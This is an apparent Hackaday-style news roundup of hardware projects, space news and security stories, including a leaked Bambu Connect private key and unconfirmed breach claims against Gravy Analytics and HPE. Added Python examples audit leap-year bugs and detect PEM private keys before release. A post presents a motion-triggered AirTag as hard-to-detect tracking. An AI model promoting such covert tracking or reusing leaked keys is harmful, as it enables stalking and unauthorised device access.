When we first read “printing bones”, we didn’t know if they were discussing making replacement bones, or printing using actual bones in the mix. (Of course we’ve covered both before. This is Hackaday.)
Thanks [JohnU] for the tip!
Robotics Class is Open
If you are like us, you probably just spin up your own code for a lot of simple projects. But that’s wasteful if you are trying to do anything serious. Take a robot, for example. Are you using ROS (Robot Operating System)? If not — or even if you are — check out [Janne Karttunene] and the University of Eastern Finland’s open-source course Robotics and ROS 2 Essentials.
The material is on GitHub. Rather than paraphrase, here’s the description from the course itself:
This course is designed to give you hands-on experience with the basics of robotics using ROS 2 and Gazebo simulation. The exercises focus on the Andino robot from Ekumen and are structured to gradually introduce you to ROS 2 and Docker. No prior experience with ROS 2 or Docker is needed, and since everything runs through Docker, you won't need to install ROS 2 on your system beforehand. Along the way, you'll learn essential concepts like autonomous navigation and mapping for mobile robots. All the practical coding exercises are done in Python.
Topics include SLAM, autonomous navigation, odometry, and path planning. It looks like it will be a valuable resource for anyone interested in robotics or anything else you might do with ROS.
If you want a quick introduction to ROS, we can help. We’ve seen a number of cool ROS projects over the years.
Hackaday Links: January 19, 2025
This week, we witnessed a couple of space oopsies as both Starship and New Glenn suffered in-flight mishaps on the same day. SpaceX’s Starship was the more spectacular, with the upper stage of the seventh test flight of the full stack experiencing a “rapid unscheduled disassembly” thanks to a fire developing in the aft section of the stage somewhere over the Turks and Caicos islands, about eight and a half minutes after takeoff from Boca Chica. The good news is that the RUD happened after first-stage separation, and that the Super Heavy booster was not only able to safely return to the pad but also made another successful “chopsticks” landing on the tower. Sorry, that’s just never going to get old.
On the Bezos side of the billionaire rocket club, the maiden flight of Blue Origin’s New Glenn ended with the opposite problem. The upper stage reached orbit, but the reusable booster didn’t make it back to the landing barge parked off the Bahamas. What exactly happened isn’t clear yet, but judging by the telemetry the booster was coming in mighty fast, which may indicate that the engines didn’t restart fully and the thing just broke up when it got into the denser part of the atmosphere.
While we’re not huge fans of doorbell cameras, mainly on privacy grounds but also because paying a monthly fee for service just seems silly, we might reconsider our position after one captured video of a meteorite strike. The impact, which occurred at the Prince Edward Island home of Joe Velaidum, happened back in July but the video was only just released; presumably the delay was for confirmation that the object was indeed a meteorite. Joe’s Ring camera captured video of something yeeting out of the sky and crashing into the sidewalk next to the driveway, in the exact spot he’d been standing only moments before. It’s hard to say if he would have been killed by the impact, but it sure wouldn’t have been fun.
youtube.com/embed/dJJtLtV0Gx4?…
While we’re on space-adjacent topics, we saw an interesting story about a satellite that was knocked out of service for a couple of days thanks to 2024 being a leap year. The Eutelsat OneWeb communications satellite went offline on the last day of the year, apparently because some software wasn’t prepared for the fact that 2024 had 366 days. It’s not clear if this caused any problems with the satellite itself, although the company said the problem was with the “ground segment” so it likely wasn’t. Engineers were able to work through the problem and get it back online within 48 hours, but we’re left wondering how something like this could happen with so many standard libraries out there that specifically deal with leap day calculations.
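The OneWeb outage is described above only at the level of the company’s statement, so the code below is an added illustration of the class of bug, not the satellite operator’s software. It puts a deliberately leap-unaware day-of-year converter (the kind built on a hard-coded 365-day month table) beside a version that leans on the standard library, and audits every day of a given year to show where the two disagree. The point a reviewer should take away is in the audit result: the naive code is correct on every day of 2023, which is exactly how it survives a year of testing, and then fails from 29 February 2024 onward and cannot represent day 366 at all.

```python
from datetime import date, timedelta

# Month lengths for a non-leap year: the kind of hard-coded table that
# date-handling code written without leap years in mind tends to carry.
DAYS_IN_MONTH_NON_LEAP = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]


def is_leap_year(year: int) -> bool:
    """Gregorian rule: every 4th year, except century years not divisible by 400."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)


def naive_doy_to_date(year: int, day_of_year: int) -> tuple[int, int, int]:
    """Deliberately buggy conversion that assumes every year has 365 days.

    Returns (year, month, day). In a leap year it drifts by one day from
    29 February onwards and has no representation for day 366 at all.
    """
    remaining = day_of_year
    for month, length in enumerate(DAYS_IN_MONTH_NON_LEAP, start=1):
        if remaining <= length:
            return (year, month, remaining)
        remaining -= length
    raise ValueError(f"day {day_of_year} does not exist in year {year}")


def correct_doy_to_date(year: int, day_of_year: int) -> tuple[int, int, int]:
    """Leap-safe conversion: let the standard library do the calendar arithmetic."""
    days_in_year = 366 if is_leap_year(year) else 365
    if not 1 <= day_of_year <= days_in_year:
        raise ValueError(f"day {day_of_year} does not exist in year {year}")
    d = date(year, 1, 1) + timedelta(days=day_of_year - 1)
    return (d.year, d.month, d.day)


def audit_conversion(year: int) -> list[int]:
    """Days of `year` on which the naive converter is wrong or fails outright.

    An empty list means the naive code happens to be safe for that year,
    which is exactly why such bugs survive testing in non-leap years.
    """
    bad_days = []
    for doy in range(1, (366 if is_leap_year(year) else 365) + 1):
        try:
            if naive_doy_to_date(year, doy) != correct_doy_to_date(year, doy):
                bad_days.append(doy)
        except ValueError:
            bad_days.append(doy)
    return bad_days


if __name__ == "__main__":
    for y in (2023, 2024):
        bad = audit_conversion(y)
        print(f"{y}: {len(bad)} bad days, first bad day: {bad[0] if bad else 'none'}")
    # Day 366 of 2024 is 31 December; the naive converter cannot represent it.
    print(correct_doy_to_date(2024, 366))
```

Running the audit against both a non-leap and a leap year is the useful part: a test suite that only exercises the current year will pass for three years out of four, so date-handling code deserves explicit fixtures for 29 February and day 366.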
It’s that time of year again — HOPE_16 is gearing up, and tickets for the August 15-17 conference at St. John’s University in Queens are already on sale. It looks like the Call for Proposals is active now too, so if you’ve got a talk you’d like to give, get going.
And finally, sad news for a hapless early adopter of Bitcoin, whose eleven-year effort to locate a hard drive with 8,000 Bitcoin on it has reached a legal end. Back in 2013, a hard drive owned by James Howells containing the Bitcoin wallet was accidentally disposed of, ending up in a landfill in Newport, Wales. Howells immediately asked for permission to search for the missing fortune, which at the time was worth about $7.5 million. This seems to us like his first mistake; in light of the potential payout, we’d probably have risked a trespassing charge. Howells spent the next couple of years trying to get access while assembling a recovery team, with the effort driven by the ever-increasing price of Bitcoin. Howells also brought suit against the council to get access, an effort that a High Court judge brought to an end last week. So Howells is out of luck, and the hard drive, now worth $765 million, still lies in the landfill.
Dillo Turns 25, and Releases a New Version
The chances are overwhelming that you are reading this article on a web browser powered by some form of the Blink or WebKit browser engines as used by Google, Apple, and many open source projects, or perhaps the Gecko engine as used by Firefox. At the top end of the web browser world there are now depressingly few maintained browser engines — we think to the detriment of web standards evolution.
Moving away from the big players though, there are several small browser projects which eschew bells and whistles for speed and compactness, and we’re pleased to see that one of the perennial players has released a new version as it passes its quarter century.
Dillo describes itself as “a fast and small graphical web browser”, and it provides a basic window on the web with a tiny download and the ability to run on very low-end hardware. Without JavaScript and other luxuries it sometimes doesn’t render a site as you’d see it in Chrome or Firefox, but we’re guessing many users would relish some escape from the web’s cycle-sucking garbage. The new version 3.2.0 brings bug fixes, as well as math formula rendering and navigation improvements.
The special thing about Dillo is that this is a project which came back from the dead. We reported last year how a developer resurrected it after a previous release back in 2015, and it seems that for now at least it has a healthy future. So put it on your retro PC, your original Raspberry Pi, or your Atari if you have one, and try it on your modern desktop if you need reminding just how fast web browsing can be.
This isn’t the only interesting browser project on the block; we’re also keeping an eye on Ladybird, which is aiming for those big players rather than simplicity like Dillo.
Thanks [Feinfinger] for the tip.
Everything About Ransomware: a Line-by-Line Commentary on the ACN/CSIRT Document (audio only)
In this episode I commented line by line on a document by ACN and CSIRT that carefully goes through all the most interesting aspects of ransomware. The video is also available on my YouTube channel, for anyone who wants to follow along with the text of the document.
zerodays.podbean.com/e/tutto-s…
Bambu Connect’s Authentication X.509 Certificate and Private Key Extracted
Hot on the heels of Bambu Lab’s announcement that it would be locking down all network access to its X1-series 3D printers with new firmware, the X.509 certificate and private key from the Bambu Connect application have now been extracted by [hWuxH]. This application was intended to be the sole way for third-party software to send print jobs to Bambu Lab hardware as we previously reported.
The Bambu Connect app is a fairly low-effort Electron-based affair, with some attempt at obfuscation and encryption, but not enough to keep prying eyes out. The de-obfuscated main.js file can be found here, with the certificate and private key clearly visible. These are used to encrypt HTTP traffic with the printer, and are the sole thing standing in the way of tools like OrcaSlicer talking with authentication-enabled Bambu Lab printers.
As for what will be the next steps by Bambu Lab, it’s now clear that security through obfuscation is not going to be very effective here. While playing whack-a-mole with (paying) users who are only interested in using their hardware in the way that they want is certainly an option, this might be a wake-up call for the company that being more forthcoming with their userbase would be in anyone’s best interest.
We await Bambu Lab’s response with bated breath.
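The lesson of the story above is that a private key shipped inside a client application is, by construction, in the hands of every user of that application. The defensive counterpart is a release gate that refuses to publish an artifact containing PEM private-key material at all. The following is an added example written for this page, not Bambu Lab’s code or any project’s tooling: it scans a directory tree of files about to be shipped for `-----BEGIN ... PRIVATE KEY-----` blocks, including keys embedded in JavaScript string literals with escaped newlines, and reports the file, byte offset and key type. The two-file “bundle” it builds (`main.js`, `renderer.js`) and the key body inside it are constructed placeholders, not real key material.

```python
import re
import tempfile
from pathlib import Path

# A PEM private key is always bracketed by BEGIN/END lines naming its type;
# the body in between is base64 (or, inside a JS string, base64 with escaped
# newlines). DOTALL lets ".*?" span real or escaped line breaks alike, and the
# backreference requires the END line to name the same type as the BEGIN line.
PEM_PRIVATE_KEY_RE = re.compile(
    rb"-----BEGIN (?P<type>(?:RSA |EC |DSA |OPENSSH |ENCRYPTED )?PRIVATE KEY)-----"
    rb".*?"
    rb"-----END (?P=type)-----",
    re.DOTALL,
)


def scan_bytes(data: bytes) -> list[tuple[int, str]]:
    """Return (byte offset, key type) for each PEM private key block in `data`."""
    return [(m.start(), m.group("type").decode("ascii"))
            for m in PEM_PRIVATE_KEY_RE.finditer(data)]


def scan_tree(
    root: Path,
    suffixes: tuple[str, ...] = (".js", ".json", ".pem", ".txt", ".asar"),
) -> dict[str, list[tuple[int, str]]]:
    """Scan every file under `root` with one of `suffixes`; return {relative path: hits}."""
    findings: dict[str, list[tuple[int, str]]] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_bytes(path.read_bytes())
            if hits:
                findings[str(path.relative_to(root))] = hits
    return findings


def release_gate(root: Path) -> bool:
    """True if the tree is clean and safe to publish, False if any private key was found."""
    return not scan_tree(root)


# Constructed sample inputs, not real key material: the key body is a placeholder.
# Backslash-n here is a literal backslash + n, as it would appear in JS source.
FAKE_PEM_IN_JS = (
    b'const key = "-----BEGIN PRIVATE KEY-----\\n'
    b'CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY-BODY\\n'
    b'-----END PRIVATE KEY-----";\n'
)
CLEAN_JS = (
    b'const cert = "-----BEGIN CERTIFICATE-----\\nPLACEHOLDER\\n'
    b'-----END CERTIFICATE-----";\n'
)


def demo_bundle() -> dict[str, list[tuple[int, str]]]:
    """Build a throwaway two-file 'bundle' (hypothetical file names) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "main.js").write_bytes(FAKE_PEM_IN_JS)  # ships a private key: fail
        (root / "renderer.js").write_bytes(CLEAN_JS)    # public certificate only: fine
        return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in demo_bundle().items():
        for offset, key_type in hits:
            print(f"{rel}: {key_type} at byte {offset}")
```

A certificate on its own is public and passes the gate; only private-key blocks fail it. The check is deliberately simple and catches the common case of a key pasted into source or a config file; it will not see a key that has been split across string fragments or stored encrypted, which is the kind of obfuscation the post describes, and which buys time rather than security because the client must still reassemble the key to use it.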
An Instant Gratification Game Boy Printer
When the Game Boy Printer was released back in 1998, being able to produce a hard copy of your Pokémon diploma or your latest Game Boy Camera snapshot at the touch of a button was pretty slick indeed. But in our modern paperless society, the GB Printer somehow sticks out as even more archaic than the other add-ons for Nintendo’s iconic handheld. Even among the folks who are still proudly playing the games that support the Printer, nobody actually wants to print anything out — although that doesn’t mean they don’t want to see the images.
The TinyGB Printer, developed by [Raphaël BOICHOT] and [Brian KHUU], could be considered something of a Game Boy Non-Printer. Powered by the RP2040 Zero development board, this open source hardware device plugs into your Game Boy and is picked up by all the games as a legitimate Printer. But instead of cranking out a little slip of thermal paper once you hit the button, the image is displayed in all its 240×240 glory on a 1.3 inch TFT display mounted to the top of the board.
Now, there’s a couple of neat things going on here. First of all, because the whole process is digital, [Raphaël] and [Brian] have managed to pull out all the stops and believe they are reproducing these images in the highest fidelity possible. The images are also being simultaneously stored (as PNGs) to a micro SD card on the board, which given the file size of these images, essentially gives you unlimited storage capacity. The documentation says the code might start glitching once you’ve put tens of thousands of images on the card, but surely your sanity would give out before then.
Clever use of off-the-shelf modules keeps the board cheap, easy to build, and relatively compact.
The documentation looks fantastic on this project, and we love the different variations that are possible depending on how you want to build it. For example you can choose to power it with AA or AAA batteries (to match whatever your Game Boy uses), and there’s support for removing the display if you’re more interested in banking the images than viewing them on the go.
If this project seems a bit similar, it’s probably because the duo were involved in the NeoGB Printer we covered back in 2021. Between the two this new version is considerably more polished, and it’s interesting to see how the team has improved on the basic concept over the last few years.
DIY Handheld is an Emulation Powerhouse
If you’re into handheld gaming, you’ve got a wide array of hardware options to choose from these days that are capable of running everything from console classics to full-fledged PC titles. But that doesn’t mean there aren’t enterprising gamers out there who are still building their own custom handhelds — like the Retro Lite CM5.
For this project, [StonedEdge], [GinKage], and [notime2d8] set out to create a handheld powerful enough to emulate games spanning the PlayStation 2, GameCube, and 3DS eras. Using a Radxa RK3588S compute module as a base, the build navigates the design and construction of things like the carrier board, custom controllers, and the enclosure.
The project’s build log takes the form of a set of forum entries that starts with emulating games on an OrangePi 5 and mapping out things like USB 3.0 support, Power Delivery and management, I2S audio, along with display options amongst other chores. But the project’s GitHub repo is packed with technical details for anyone looking for a more condensed version.
There are experiments with the MIPI OLED displays, and the final revision uses an RP2040 as an HID to read button presses and data from the IMU. WiFi 6 and BLE 5.2 are handled by an M.2 slot-mounted module that is interfaced over a PCI Express bus, which is always tricky when designing your PCBs. The final product looks great and there are a couple of videos that show the device in action. Additionally, the design files and code are available for anyone who fancies building one themselves.
If you like handheld gaming consoles, then have a look at the Intel NUC based Handheld with Steam Deck vibes.
youtube.com/embed/lf8C4oy6nv0?…
Motorized Coil Tunes Your Ham Antenna on a Budget
When it comes to amateur radio, one size definitely does not fit all. That’s especially true with antennas, which need to be just the right size for the band you’re working, lest Very Bad Things happen to your expensive radio. That presents a problem for the ham who wants the option to work whichever band is active, and doubly so if portable operation is desired.
Of course, there are commercial solutions to this problem, but they tend to be expensive. Luckily [Øystein (LB8IJ)] seems to have found a way around that with this low-cost homebrew motorized antenna coil, which is compatible with the Yaesu Automatic Tuning Antenna System. ATAS is supported by several Yaesu transceivers, including the FT-891 which [Øystein] favors for field operations. ATAS sends signals up the feedline to a compatible antenna, which then moves a wiper along a coil to change the electrical length of the antenna, allowing it to resonate on the radio’s current frequency.
The video below details [Øystein]’s implementation of an ATAS-compatible tuning coil, mainly focusing on the mechanical and electrical aspects of the coil itself, which takes up most of the room inside a 50-mm diameter PVC tube. The bore of the air-core coil has a channel that guides a wiper, which moves along the length of the coil thanks to a motor-driven lead screw. [Øystein] put a lot of work into the wiper, to make it both mechanically and electrically robust. He also provides limit switches to make sure the mechanism isn’t over-driven.
There’s not much detail yet on how the control signals are detected, but a future video on that subject is promised. We’re looking forward to that, but in the meantime, the second video below shows [Øystein] using the tuner in the field, with great results.
youtube.com/embed/skmWhgQLtnM?…
youtube.com/embed/MKAW8y2GVl8?…
Geolocation Data: Hackers Want to Publish the Gravy Analytics Loot
Hackers have announced that Gravy Analytics, a company that sells smartphone location data to the United States government, has been hacked. The attackers allegedly had access to a large quantity of data, including customer lists, industry information, and precise user geodata. The hackers are threatening to publish the information if the company does not respond within 24 hours.
The incident is a serious warning for the entire geolocation data trading sector. For years, companies have collected location data through mobile apps and advertising networks and then sold it to private companies and government agencies. Customers include the United States Department of Defense, the Department of Homeland Security, the Internal Revenue Service and the FBI. Such data, however, becomes an attractive target for cybercriminals.
On forums, the hackers posted data samples that included users’ exact coordinates, travel times, and additional qualifiers such as “probably driving”. The data included information on users from several countries, including Russia, Mexico and the Netherlands. Some of the data has already been used by US agencies for immigration operations.
The hackers claim to have gained access to Gravy Analytics’ infrastructure in 2018. Screenshots show full access to the company’s servers, domains and Amazon S3 storage. The hacked servers are also said to run Ubuntu, highlighting the scale of the breach.
Website of the hacked company and the hackers’ screenshots (404 Media)
In 2023, Gravy Analytics was acquired by Unacast, but the company’s website remains inaccessible. Unacast representatives have not commented on the situation.
Gravy Analytics’ customers (Gravy is the parent company of Venntel) include Apple, Uber, Comcast, Equifax and US government contractors such as Babel Street. The latter has previously used the data for tracking tools, including monitoring visitors to abortion clinics.
Earlier, the US Federal Trade Commission (FTC) had opened an investigation against Gravy Analytics and Venntel. The companies were accused of selling confidential data without user consent and were ordered to delete their historical geolocation data. The FTC stated that the companies’ actions violate a law prohibiting the unfair use of personal information.
It had previously emerged that American military bases in Europe were at risk due to leaks of location data collected for targeted advertising. The investigation revealed that US companies that legally collect data for advertising purposes in practice offer the ability to track the movements of military and intelligence personnel.
The article “Geolocation Data: Hackers Want to Publish the Gravy Analytics Loot” originally appeared on il blog della sicurezza informatica.
A Look Inside a Modern Mixed Signal Oscilloscope
High-speed bench equipment has become so much more affordable in the last decade that naturally one wonders what has made that possible. A great source of answers is a teardown by users like [kerry wong], who are kind enough to take apart their MSO2304X 300MHz oscilloscope for our viewing pleasure.
The posted teardown video shows the guts of the scope without enclosure, heatsinks and shields that reveal a handful of boards that execute the functions nicely. The motherboard uses the Xilinx KINTEX-7 FPGA that is expected to run core processes such as signal processing as well as managing the sample storage on the paired DDR3 memory.
The analog front-end here is a bit of a surprise as it sports TI’s ADC08D1000 ADCs that are capable of 1.3 GSPS but the scope is advertised to be capable of more. The inferred design is that all four ADCs are being operated in an interleaved symphony to achieve 5 GSPS. Testing confirms that each input uses two ADCs at a time and when two or more channels are employed, the reconstruction quality drops.
The input lanes are pretty standard and are equipped with amps and power regulators that are more than up to the task. More TI chips are discovered such as the DAC128S085 that are the key to the analog waveform generator which is a feature commonly found in modern high-end oscilloscopes. On the application processor side, the scope has a Rockchip RK3568 that is responsible for the GUI and other user-level functions.
An interesting point in the video was how lean the construction is, as well as the cost. The FPGA, ADCs, and other analog components are estimated to total the sale price of the scope, which means that manufacturer pricing would have to be heavily discounted to leave any gross margin on sales. We also loved the review of the scope, which is the other part of the story.
youtube.com/embed/rY8mqdbomXA?…
Stealth AirTag Broadcasts When Moved: an Experiment
A simple yet intriguing idea is worth sharing, even if it wasn’t a flawless success: it can inspire others. [Richard]’s experiment with a motion-powered AirTag fits this bill. Starting with our call for simple projects, [Richard] came up with a circuit that selectively powers an AirTag based on movement. His concept was to use an inertial measurement unit (IMU) and a microcontroller to switch the AirTag on only when it’s on the move, creating a stealthy and battery-efficient tracker.
The setup is minimal: an ESP32 microcontroller, an MPU-6050 IMU, a transistor, and some breadboard magic. [Richard] demonstrates the concept using a clone AirTag due to concerns about soldering leads onto a genuine one. The breadboard-powered clone chirps to life when movement is detected, but that’s where challenges arise. For one, Apple AirTags are notoriously picky about batteries—a lesson learned when Duracell’s bitter coating blocks functionality. And while the prototype works initially, an unfortunate soldering mishap sadly sends the experiment off the rails.
Despite the setbacks, this project may spark a discussion on the possibilities of DIY digital camouflage for Bluetooth trackers. By powering up only when needed, such a device avoids constant broadcasting, making it harder to detect or block. Whether for tracking stolen vehicles or low-profile uses, it’s a concept rich with potential. We talked about this back in 2022, and there’s an interesting 38C3 talk that sheds quite some light on the broadcasting protocols and standards.
youtube.com/embed/WpcrsezGGOM?…
Header AirTag: Apple, Public domain, via Wikimedia Commons
I3C Bit-banging Fun for the RP2040
The RP2040 has quickly become a hot favorite with tinkerers and makers since its release in early 2021. This is largely attributed to the low cost, fast GPIOs, and plethora of bus peripherals. [xyphro] has written the I3C Blaster firmware that helps turn the Raspberry Pi Pico into a USB to I3C converter.
The firmware is essentially a bit-bang wrapper and exposes an interactive shell with a generous command set. But it is a lot more than that. [xyphro] has taken the time to dive into the I3C implementation standard and the code is a fairly complex state-machine that is a story on its own.
[xyphro] provides a Python script in case you feel like automating things or drawing up your GUI. And finally, if you are feeling adventurous, the I3C implementation is available for your project tinkering needs.
We loved the fact that there is a branch project that lets you extend a Saleae Logic Analyzer to decode I3C and associated protocols by adding a Pico on the cheap. The last update to the project log shows the addition of the MIPI I3C High Data Rate Mode, which operates at 25 Mbps, right up the RP2040’s alley.
[xyphro] gave us the Home Brew Version Of Smart Tweezers a decade ago and we expect there is more to come. If you are interested in reading more about the I3C bus, have a look at I3C — No Typo — Wants To Be Your Serial Bus.
Investigating USB-to-Ethernet Dongles With “Malware” Claims
Recently a video surfaced from someone claiming that certain USB-to-Ethernet dongles contained ‘malware’ among other big claims. Basically these dongles were said to be designed by China (and Russia) to spy on users and so on, but how much of this is actually grounded in reality? When [lcamtuf] dove into the topic, what he found was not so much a smoking gun, but rather a curious relic from the era when drivers-on-CD were being phased out.
The item that the video went bananas about was an additional SPI Flash chip on the PCB alongside the USB 2.0 to Ethernet IC, with many conspiracy theories being floated as to what it would be used for. After some digging, [lcamtuf] found that the IC used in these dongles (SR9900) is by a company called CoreChips Shenzhen, with a strong suggestion that it is a clone of the (2013-era) Realtek RTL8152B.
Both chips have an external SPI Flash option, which is used with the USB side to present a ‘virtual CD drive’ to the user when the dongle is plugged in. This was borne out with the SR9900 Windows system mass production tool that [lcamtuf] obtained a copy of. Included with the flashing tool is a 168 kB ISO image (containing the SR9900 driver package) which happily fits on the 512 kB Flash chip.
Although it’s always possible for chips and firmware to contain backdoors and malware, in this particular case it would appear to be merely a cruel reminder that 2013 is now already vanishing into the realm of ‘retro computing’ as we old fogies cling to our driver installation floppies and CDs.
Putting Cheap Motorcycle Tachometers to Work
With so much data being thrown at our eyeballs these days, it’s worryingly easy for the actually important stuff to slip by occasionally. So when [Liam Jackson] wanted a way to visualize the number of test failures popping up in the continuous integration system at work, he went with a novel but effective solution — universal motorcycle tachometers.
It turns out these little gauges can be had for under $10 a piece from the usual overseas retailers, and are very easy to drive with a microcontroller. As [Liam] explains, all you need to do other than providing them with 12 volts, is feed them a PWM signal. Even though the gauges are designed for a 12 V system, they apparently don’t have any problem responding to the 5 V logic level from the Arduino’s pins.
As for the frequency, he says that 1,000 RPM corresponds to 16.66 Hz, so you can just multiply up from there to show whatever number you wish. That said, [Liam] warns that the gauges draw several hundred milliamps once the needle gets into the two-digit range, so keep that in mind. Conveniently, those numbers happen to be in red anyway…
For his particular application, [Liam] put three of the gauges together to create a very handsome dashboard. If you want to recreate his setup exactly he’s made the STLs available for the gauge cluster housing. Note the small OLED at the center, this offers a way to show a bit more context than the three analog gauges alone can express, especially if you’ve got an application where you might be switching between multiple data sources.
Over the years we’ve seen several projects that repurposed analog gauges of various types, often for showing computer performance, but they generally involved having to drive the galvanometers directly. That these tachometers can simply be fed a simple digital signal should make implementing them into your project much easier.
Learn New Tools, or Hone Your Skill with the Old?
Buried in a talk on AI from an artist who is doing cutting-edge video work was the following nugget that entirely sums up the zeitgeist: “The tools are changing so fast that artists can’t keep up with them, let alone master them, before everyone is on to the next.” And while you might think that this concern is only relevant to those who have to stay on the crest of the hype wave, the deeper question resounds with every hacker.
When was the last time you changed PCB layout software or refreshed your operating system? What other tools do you use in your work or your extra-curricular projects, and how long have you been using them? Are you still designing your analog front-ends with LM358s, or have you looked around to see that technology has moved on since the 1970s? “OMG, you’re still using STM32F103s?”
It’s not a simple question, and there are no good answers. Proficiency with a tool, like for instance the audio editor with which I crank out the podcast every week, only comes through practice. And practice simply takes time and effort. When you put your time in on a tool, it really is an investment in that it helps you get better. But what about that newer, better tool out there?
Some of the reluctance to update is certainly sunk-cost fallacy, after all you put so much sweat and tears into the current tool, but there is also a real cost to overcome to learn the new hotness, and that’s no fallacy. If you’re always trying to learn a new way of doing something, you’re never going to get good at doing something, and that’s the lament of our artist friend. Honing your craft requires focus. You won’t know the odd feature set of that next microcontroller as well as you do the old faithful – not without sitting down and reading the datasheet and doing a couple of finger-stretching projects first.
Striking the optimal balance here is hard. On a per-project basis, staying with your good old tool or swapping to the new hotness is a binary choice, but across your projects, you can do some of each. Maybe it makes sense to budget some of your hacking time into learning new tools? How about ten percent? What do you think?
This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!
JTAG & SWD Debugging on the Pi Pico
[Surya Chilukuri] writes in to share JTAGprobe — a fork of the official Raspberry Pi debugprobe firmware that lets you use the low-cost microcontroller development board for JTAG and SWD debugging just by flashing the provided firmware image.
We’ve seen similar projects in the past, but they’ve required some additional code running on the computer to bridge the gap between the Pico and your debugging software of choice. But [Surya] says this project works out of the box with common tools such as OpenOCD and pyOCD.
As we’ve cautioned previously, remember that the Pi Pico is only a 3.3 V device. JTAG and SWD don’t have set voltages, so in the wild you could run into logic levels from 1.2 V all the way to 5.5 V. While being able to use a bare Pico as a debugger is a neat trick, adding in a level shifter would be a wise precaution.
Looking to get even more use out of those Pi Picos you’ve got in the parts bin? How about using it to sniff USB?
A PDA From An ESP32
The ESP32 series of microcontrollers have been with us for quite a few years now and appeared in both Tensilica and RISC-V variants, both of which deliver an inexpensive and powerful device. It’s thus shown up in quite a few handheld computers, whether they be conference badges or standalone devices, and this is definitely a field in which these chips have more to give. We’re pleased then to see this e-ink PDA from [ashtf8], which we think raises the bar on this type of device.
At its heart is an ESP32-S3, on the back side of a QWERTY keyboard PCB, and for a display it has an e-ink screen. To get over the annoying e-ink refresh when typing text it uses a hybrid of e-ink and OLED, with a small OLED holding the current line which can be periodically sent to the e-ink. Perhaps the nicest thing about the hardware though is the clear resin printed clamshell case, and a hand-cast silicone membrane for the keyboard. That has always been a part considered difficult to produce, and here he is making one from scratch. Take a look at the video below the break.
Software-wise it has a range of apps with more promised, but even as it stands it looks useful enough to work with. If that’s not enough, then perhaps an ESP32 operating system would help.
youtube.com/embed/308KoLSLlCc?…
HPE in the crosshairs: IntelBroker publishes a massive breach. A bluff on the Dark Web?
The cybersecurity landscape has once again been shaken by IntelBroker, a well-known threat actor, who has claimed responsibility for a significant alleged breach of Hewlett Packard Enterprise (HPE).
According to statements posted on a Dark Web forum, the attack is said to have exposed sensitive internal data, including source code, certificates and API credentials. Although the details have not yet been officially confirmed, the event has sparked a debate about possible risks and vulnerabilities for one of the giants of IT.
At present, we cannot confirm the veracity of the news, since the organization has not yet issued any official press release on its website regarding the incident. This article should therefore be considered an 'intelligence source'.
The alleged evidence of compromise
IntelBroker did not limit themselves to claiming the breach, but provided details to support their claims. However, it is fair to ask: is the evidence shared really sufficient to confirm an attack of this scale?
In support of these claims, IntelBroker reportedly shared screenshots of internal systems (no longer available), API endpoints and technical documentation, lending credibility to their assertions.
The implications of a possible breach
If confirmed, the consequences of this attack could be devastating for HPE. These are the main risks highlighted:
- Credential abuse: The exposed credentials could be used to access integrated platforms such as Salesforce, leading to further breaches or system manipulation.
- Service manipulation: Knowing operational details such as execution times and logging frequencies could allow attackers to alter system performance or cover their tracks.
- Targeted phishing campaigns: The associated email addresses and names could be exploited for social engineering and phishing campaigns against HPE employees and partners.
- Reputational damage: Beyond the technical risks, the trust of customers and partners could be seriously compromised.
Who is IntelBroker?
IntelBroker has stood out in recent years for targeted attacks against large enterprises, exploiting vulnerabilities in internal systems to maximize the impact of their operations. In this alleged breach, the actor demonstrated a high level of sophistication, aimed not only at data exfiltration but also at gathering critical information about HPE's systems and operations. This attack, if confirmed, would represent one of the most significant operations attributed to IntelBroker.
How should HPE respond?
Faced with these accusations, HPE must act quickly to contain the damage and strengthen its security. Recommended actions include:
- Immediate incident management: Block any residual access and assess the extent of the breach.
- Credential rotation: Revoke and regenerate all compromised API keys, certificates and credentials.
- In-depth security audit: Analyze the controls on repositories, development systems and API integrations.
- Customer communication: Promptly inform affected customers and provide support to mitigate the risks.
- Threat monitoring: Monitor Dark Web forums for further publications or transactions involving the stolen data.
Conclusion
This affair, even while still awaiting definitive confirmation, highlights the need for a proactive approach to cybersecurity. IntelBroker, through their actions, not only underlines the vulnerabilities of large organizations such as HPE, but also raises fundamental questions:
- Is this an isolated case, or just the first in a series of more complex attacks?
- Are we doing enough to protect critical infrastructure?
- How can we improve the monitoring of emerging threats?
As is our custom, we always leave room for a statement from the company should it wish to give us updates on the matter. We will be happy to publish such information in a dedicated article highlighting the issue.
RHC will monitor the evolution of the affair in order to publish further news on the blog should there be substantial developments. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.
The article "HPE in the crosshairs: IntelBroker publishes a massive breach. A bluff on the Dark Web?" originally appeared on il blog della sicurezza informatica.
A Field Expedient Welder Only MacGyver Could Love
If you needed to weld something in a pinch, what’s the minimum complement of equipment you could get away with? In [Professor Bardal]’s case, it’s a couple of motorcycle batteries and a roll of flux-core wire, and not much else.
We suspect this one is going to elicit quite a few comments, not least by the welding fans who no doubt will be triggered by just about everything in the video below, especially by characterizing this as MIG welding; it’s FCAW, or flux-core arc welding. But it bears some superficial similarities to MIG, at least insofar as there’s a consumable wire electrode through which a high-current DC supply flows, creating enough heat to melt it and the base metal. In this case, the current is provided by a pair of 12-volt motorcycle batteries hooked together in series. There’s also a torch of sorts — a short length of copper capillary tubing with a 1-mm inside diameter clamped in the jaws of a stick welder stinger, or a pair of locking pliers if you’re really in a pinch. The torch is connected to the negative terminal on the battery with a jumper cable, and the positive terminal is connected to the workpiece.
To create the weld, a piece of 0.8-mm flux-core welding wire is threaded through the capillary and into the joint, and fed by hand as it’s consumed. It’s awkward and awful, but it works. Of course, there’s no control over amperage as there would be with a legit welding machine, which would make it hard to adapt this method to different materials. Weld quality appears poor, too. But we suspect that if you were in a position to need a welder like this, you wouldn’t really care about any of that.
